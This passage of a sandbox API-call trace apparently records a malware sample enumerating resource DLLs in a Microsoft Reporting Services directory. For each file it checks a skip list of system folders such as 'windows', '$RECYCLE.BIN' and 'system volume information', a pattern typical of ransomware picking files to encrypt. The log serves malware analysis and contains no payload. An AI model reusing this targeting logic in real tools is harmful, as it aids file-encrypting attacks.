cbMultiByte=63, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.QueryDesigners.Common.resources.dll", lpUsedDefaultChar=0x0) returned 63 [0126.868] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225768 | out: hHeap=0x1e0000) returned 1 [0126.868] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224aa8 [0126.868] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.QueryDesigners.Common.resources.dll", cchWideChar=63, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 63 [0126.868] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dba8 [0126.868] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.QueryDesigners.Common.resources.dll", cchWideChar=63, lpMultiByteStr=0x20dba8, cbMultiByte=63, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.QueryDesigners.Common.resources.dll", lpUsedDefaultChar=0x0) returned 63 [0126.868] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224aa8 | out: hHeap=0x1e0000) returned 1 [0126.868] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x130) returned 0x244be8 [0126.868] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e458 | out: hHeap=0x1e0000) returned 1 [0126.868] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dba8 | out: hHeap=0x1e0000) returned 1 [0126.868] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0126.868] FindNextFileW (in: hFindFile=0x231c40, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x637c06e, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x637c06e, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x637c06e, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x70ad8, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="Microsoft.ReportingServices.QueryDesigners.resources.dll", cAlternateFileName="MI63FB~1.DLL")) returned 1 [0126.868] lstrcmpiW (lpString1="Microsoft.ReportingServices.QueryDesigners.resources.dll", lpString2=".") returned 1 [0126.868] lstrcmpiW (lpString1="Microsoft.ReportingServices.QueryDesigners.resources.dll", lpString2="..") returned 1 [0126.868] lstrcmpiW (lpString1="Microsoft.ReportingServices.QueryDesigners.resources.dll", lpString2="...") returned 1 [0126.868] lstrcmpiW (lpString1="Microsoft.ReportingServices.QueryDesigners.resources.dll", lpString2="windows") returned -1 [0126.868] lstrcmpiW (lpString1="Microsoft.ReportingServices.QueryDesigners.resources.dll", lpString2="recovery") returned -1 [0126.868] lstrcmpiW (lpString1="Microsoft.ReportingServices.QueryDesigners.resources.dll", lpString2="perflogs") returned -1 [0126.869] lstrcmpiW (lpString1="Microsoft.ReportingServices.QueryDesigners.resources.dll", lpString2="documents and settings") returned 1 [0126.869] lstrcmpiW (lpString1="Microsoft.ReportingServices.QueryDesigners.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0126.869] lstrcmpiW (lpString1="Microsoft.ReportingServices.QueryDesigners.resources.dll", lpString2="system volume information") returned -1 [0126.869] lstrcmpiW (lpString1="Microsoft.ReportingServices.QueryDesigners.resources.dll", lpString2="msocache") returned -1 [0126.869] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x2252a0 [0126.869] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.QueryDesigners.resources.dll", cchWideChar=56, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 56 [0126.869] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dba8 [0126.869] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.QueryDesigners.resources.dll", cchWideChar=56, lpMultiByteStr=0x20dba8, cbMultiByte=56, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.QueryDesigners.resources.dll", lpUsedDefaultChar=0x0) returned 56 [0126.869] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2252a0 | out: hHeap=0x1e0000) returned 1 [0126.869] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225768 [0126.869] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.QueryDesigners.resources.dll", cchWideChar=56, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 56 [0126.869] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0126.869] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.QueryDesigners.resources.dll", cchWideChar=56, lpMultiByteStr=0x20dde8, cbMultiByte=56, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.QueryDesigners.resources.dll", lpUsedDefaultChar=0x0) returned 56 [0126.869] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225768 | out: hHeap=0x1e0000) returned 1 [0126.869] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x120) returned 0x23f848 [0126.869] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x244be8 | out: hHeap=0x1e0000) returned 1 [0126.869] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0126.869] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dba8 | out: hHeap=0x1e0000) returned 1 [0126.869] FindNextFileW (in: hFindFile=0x231c40, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf1860d8a, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf1860d8a, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf1860d8a, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x15068, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="Microsoft.ReportingServices.ReportDesign.Common.resources.dll", cAlternateFileName="MICROS~4.DLL")) returned 1 [0126.869] lstrcmpiW (lpString1="Microsoft.ReportingServices.ReportDesign.Common.resources.dll", lpString2=".") returned 1 [0126.869] lstrcmpiW (lpString1="Microsoft.ReportingServices.ReportDesign.Common.resources.dll", lpString2="..") returned 1 [0126.869] lstrcmpiW (lpString1="Microsoft.ReportingServices.ReportDesign.Common.resources.dll", lpString2="...") returned 1 [0126.869] lstrcmpiW (lpString1="Microsoft.ReportingServices.ReportDesign.Common.resources.dll", lpString2="windows") returned -1 [0126.869] lstrcmpiW (lpString1="Microsoft.ReportingServices.ReportDesign.Common.resources.dll", lpString2="recovery") returned -1 [0126.869] lstrcmpiW (lpString1="Microsoft.ReportingServices.ReportDesign.Common.resources.dll", lpString2="perflogs") returned -1 [0126.869] lstrcmpiW (lpString1="Microsoft.ReportingServices.ReportDesign.Common.resources.dll", lpString2="documents and settings") returned 1 [0126.869] lstrcmpiW (lpString1="Microsoft.ReportingServices.ReportDesign.Common.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0126.869] lstrcmpiW (lpString1="Microsoft.ReportingServices.ReportDesign.Common.resources.dll", lpString2="system volume information") returned -1 [0126.869] lstrcmpiW (lpString1="Microsoft.ReportingServices.ReportDesign.Common.resources.dll", lpString2="msocache") returned -1 [0126.869] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x2257f0 [0126.869] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.ReportDesign.Common.resources.dll", cchWideChar=61, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0126.869] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d800 [0126.869] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.ReportDesign.Common.resources.dll", cchWideChar=61, lpMultiByteStr=0x20d800, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.ReportDesign.Common.resources.dll", lpUsedDefaultChar=0x0) returned 61 [0126.869] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2257f0 | out: hHeap=0x1e0000) returned 1 [0126.869] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225548 [0126.870] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.ReportDesign.Common.resources.dll", cchWideChar=61, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0126.870] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d728 [0126.870] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.ReportDesign.Common.resources.dll", cchWideChar=61, lpMultiByteStr=0x20d728, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.ReportDesign.Common.resources.dll", lpUsedDefaultChar=0x0) returned 61 [0126.870] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225548 | out: hHeap=0x1e0000) returned 1 [0126.870] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x120) returned 0x23f970 [0126.870] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f848 | out: hHeap=0x1e0000) returned 1 [0126.870] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d728 | out: hHeap=0x1e0000) returned 1 [0126.870] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d800 | out: hHeap=0x1e0000) returned 1 [0126.870] FindNextFileW (in: hFindFile=0x231c40, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf1ac3289, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf1ac3289, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf1ac3289, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0xb078, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="Microsoft.ReportingServices.ReportDesign.Forms.resources.dll", cAlternateFileName="MI335D~1.DLL")) returned 1 [0126.870] lstrcmpiW (lpString1="Microsoft.ReportingServices.ReportDesign.Forms.resources.dll", lpString2=".") returned 1 [0126.870] lstrcmpiW (lpString1="Microsoft.ReportingServices.ReportDesign.Forms.resources.dll", lpString2="..") returned 1 [0126.870] lstrcmpiW (lpString1="Microsoft.ReportingServices.ReportDesign.Forms.resources.dll", lpString2="...") returned 1 [0126.870] lstrcmpiW (lpString1="Microsoft.ReportingServices.ReportDesign.Forms.resources.dll", lpString2="windows") returned -1 [0126.870] lstrcmpiW (lpString1="Microsoft.ReportingServices.ReportDesign.Forms.resources.dll", lpString2="recovery") returned -1 [0126.870] lstrcmpiW (lpString1="Microsoft.ReportingServices.ReportDesign.Forms.resources.dll", lpString2="perflogs") returned -1 [0126.870] lstrcmpiW (lpString1="Microsoft.ReportingServices.ReportDesign.Forms.resources.dll", lpString2="documents and settings") returned 1 [0126.870] lstrcmpiW (lpString1="Microsoft.ReportingServices.ReportDesign.Forms.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0126.870] lstrcmpiW (lpString1="Microsoft.ReportingServices.ReportDesign.Forms.resources.dll", lpString2="system volume information") returned -1 [0126.870] lstrcmpiW (lpString1="Microsoft.ReportingServices.ReportDesign.Forms.resources.dll", lpString2="msocache") returned -1 [0126.870] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225080 [0126.870] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.ReportDesign.Forms.resources.dll", cchWideChar=60, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 60 [0126.870] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d800 [0126.870] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.ReportDesign.Forms.resources.dll", cchWideChar=60, lpMultiByteStr=0x20d800, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.ReportDesign.Forms.resources.dll", lpUsedDefaultChar=0x0) returned 60 [0126.870] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225080 | out: hHeap=0x1e0000) returned 1 [0126.870] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x2254c0 [0126.870] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.ReportDesign.Forms.resources.dll", cchWideChar=60, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 60 [0126.870] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0126.870] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.ReportDesign.Forms.resources.dll", cchWideChar=60, lpMultiByteStr=0x20dde8, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.ReportDesign.Forms.resources.dll", lpUsedDefaultChar=0x0) returned 60 [0126.870] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2254c0 | out: hHeap=0x1e0000) returned 1 [0126.870] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x120) returned 0x23f4d0 [0126.870] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f970 | out: hHeap=0x1e0000) returned 1 [0126.870] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0126.870] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d800 | out: hHeap=0x1e0000) returned 1 [0126.870] FindNextFileW (in: hFindFile=0x231c40, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xfa937f07, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfa937f07, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xfae22cc9, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x3ae8, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="Microsoft.ReportingServices.RsClient.resources.dll", cAlternateFileName="MI5988~1.DLL")) returned 1 [0126.871] lstrcmpiW (lpString1="Microsoft.ReportingServices.RsClient.resources.dll", lpString2=".") returned 1 [0126.871] lstrcmpiW (lpString1="Microsoft.ReportingServices.RsClient.resources.dll", lpString2="..") returned 1 [0126.871] lstrcmpiW (lpString1="Microsoft.ReportingServices.RsClient.resources.dll", lpString2="...") returned 1 [0126.871] lstrcmpiW (lpString1="Microsoft.ReportingServices.RsClient.resources.dll", lpString2="windows") returned -1 [0126.871] lstrcmpiW (lpString1="Microsoft.ReportingServices.RsClient.resources.dll", lpString2="recovery") returned -1 [0126.871] lstrcmpiW (lpString1="Microsoft.ReportingServices.RsClient.resources.dll", lpString2="perflogs") returned -1 [0126.871] lstrcmpiW (lpString1="Microsoft.ReportingServices.RsClient.resources.dll", lpString2="documents and settings") returned 1 [0126.871] lstrcmpiW (lpString1="Microsoft.ReportingServices.RsClient.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0126.871] lstrcmpiW (lpString1="Microsoft.ReportingServices.RsClient.resources.dll", lpString2="system volume information") returned -1 [0126.871] lstrcmpiW (lpString1="Microsoft.ReportingServices.RsClient.resources.dll", lpString2="msocache") returned -1 [0126.871] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209620 [0126.871] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.RsClient.resources.dll", cchWideChar=50, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 50 [0126.871] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d728 [0126.871] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.RsClient.resources.dll", cchWideChar=50, lpMultiByteStr=0x20d728, cbMultiByte=50, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.RsClient.resources.dll", lpUsedDefaultChar=0x0) returned 50 [0126.871] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209620 | out: hHeap=0x1e0000) returned 1 [0126.871] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209788 [0126.871] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.RsClient.resources.dll", cchWideChar=50, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 50 [0126.871] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dba8 [0126.871] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.RsClient.resources.dll", cchWideChar=50, lpMultiByteStr=0x20dba8, cbMultiByte=50, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.RsClient.resources.dll", lpUsedDefaultChar=0x0) returned 50 [0126.871] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209788 | out: hHeap=0x1e0000) returned 1 [0126.871] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x110) returned 0x23e688 [0126.871] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f4d0 | out: hHeap=0x1e0000) returned 1 [0126.871] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dba8 | out: hHeap=0x1e0000) returned 1 [0126.871] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d728 | out: hHeap=0x1e0000) returned 1 [0126.871] FindNextFileW (in: hFindFile=0x231c40, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xfc646a83, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfc646a83, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xfc646a83, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0xa078, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="Microsoft.SqlServer.Types.resources.dll", cAlternateFileName="MI5889~1.DLL")) returned 1 [0126.871] lstrcmpiW (lpString1="Microsoft.SqlServer.Types.resources.dll", lpString2=".") returned 1 [0126.871] lstrcmpiW (lpString1="Microsoft.SqlServer.Types.resources.dll", lpString2="..") returned 1 [0126.871] lstrcmpiW (lpString1="Microsoft.SqlServer.Types.resources.dll", lpString2="...") returned 1 [0126.871] lstrcmpiW (lpString1="Microsoft.SqlServer.Types.resources.dll", lpString2="windows") returned -1 [0126.871] lstrcmpiW (lpString1="Microsoft.SqlServer.Types.resources.dll", lpString2="recovery") returned -1 [0126.871] lstrcmpiW (lpString1="Microsoft.SqlServer.Types.resources.dll", lpString2="perflogs") returned -1 [0126.871] lstrcmpiW (lpString1="Microsoft.SqlServer.Types.resources.dll", lpString2="documents and settings") returned 1 [0126.871] lstrcmpiW (lpString1="Microsoft.SqlServer.Types.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0126.871] lstrcmpiW (lpString1="Microsoft.SqlServer.Types.resources.dll", lpString2="system volume information") returned -1 [0126.872] lstrcmpiW (lpString1="Microsoft.SqlServer.Types.resources.dll", lpString2="msocache") returned -1 [0126.872] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c3d8 [0126.872] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.SqlServer.Types.resources.dll", cchWideChar=39, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 39 [0126.872] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0126.872] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.SqlServer.Types.resources.dll", cchWideChar=39, lpMultiByteStr=0x22d260, cbMultiByte=39, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.SqlServer.Types.resources.dll", lpUsedDefaultChar=0x0) returned 39 [0126.872] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c3d8 | out: hHeap=0x1e0000) returned 1 [0126.872] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c7a0 [0126.872] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.SqlServer.Types.resources.dll", cchWideChar=39, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 39 [0126.872] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0126.872] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.SqlServer.Types.resources.dll", cchWideChar=39, lpMultiByteStr=0x22cdc8, cbMultiByte=39, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.SqlServer.Types.resources.dll", lpUsedDefaultChar=0x0) returned 39 [0126.872] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c7a0 | out: hHeap=0x1e0000) returned 1 [0126.872] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x100) returned 0x1f19f0 [0126.872] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e688 | out: hHeap=0x1e0000) returned 1 [0126.872] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0126.872] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0126.872] FindNextFileW (in: hFindFile=0x231c40, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf18f9628, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf18f9628, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf18f9628, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2e68, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="ReportingServicesNativeClient.resources.dll", cAlternateFileName="REPORT~1.DLL")) returned 1 [0126.872] lstrcmpiW (lpString1="ReportingServicesNativeClient.resources.dll", lpString2=".") returned 1 [0126.872] lstrcmpiW (lpString1="ReportingServicesNativeClient.resources.dll", lpString2="..") returned 1 [0126.872] lstrcmpiW (lpString1="ReportingServicesNativeClient.resources.dll", lpString2="...") returned 1 [0126.872] lstrcmpiW (lpString1="ReportingServicesNativeClient.resources.dll", lpString2="windows") returned -1 [0126.872] lstrcmpiW (lpString1="ReportingServicesNativeClient.resources.dll", lpString2="recovery") returned 1 [0126.872] lstrcmpiW (lpString1="ReportingServicesNativeClient.resources.dll", lpString2="perflogs") returned 1 [0126.872] lstrcmpiW (lpString1="ReportingServicesNativeClient.resources.dll", lpString2="documents and settings") returned 1 [0126.872] lstrcmpiW (lpString1="ReportingServicesNativeClient.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0126.872] lstrcmpiW (lpString1="ReportingServicesNativeClient.resources.dll", lpString2="system volume information") returned -1 [0126.872] lstrcmpiW (lpString1="ReportingServicesNativeClient.resources.dll", lpString2="msocache") returned 1 [0126.872] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232d50 [0126.872] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ReportingServicesNativeClient.resources.dll", cchWideChar=43, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 43 [0126.872] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0126.872] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ReportingServicesNativeClient.resources.dll", cchWideChar=43, lpMultiByteStr=0x22d0d8, cbMultiByte=43, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ReportingServicesNativeClient.resources.dll", lpUsedDefaultChar=0x0) returned 43 [0126.872] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232d50 | out: hHeap=0x1e0000) returned 1 [0126.872] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x2331c8 [0126.872] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ReportingServicesNativeClient.resources.dll", cchWideChar=43, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 43 [0126.872] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0126.873] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ReportingServicesNativeClient.resources.dll", cchWideChar=43, lpMultiByteStr=0x22d260, cbMultiByte=43, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ReportingServicesNativeClient.resources.dll", lpUsedDefaultChar=0x0) returned 43 [0126.873] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2331c8 | out: hHeap=0x1e0000) returned 1 [0126.873] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x100) returned 0x1ef7e0 [0126.873] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f19f0 | out: hHeap=0x1e0000) returned 1 [0126.873] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0126.873] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0126.873] FindNextFileW (in: hFindFile=0x231c40, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf18f9628, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf18f9628, ftLastAccessTime.dwHighDateTime=0x1d327e7, 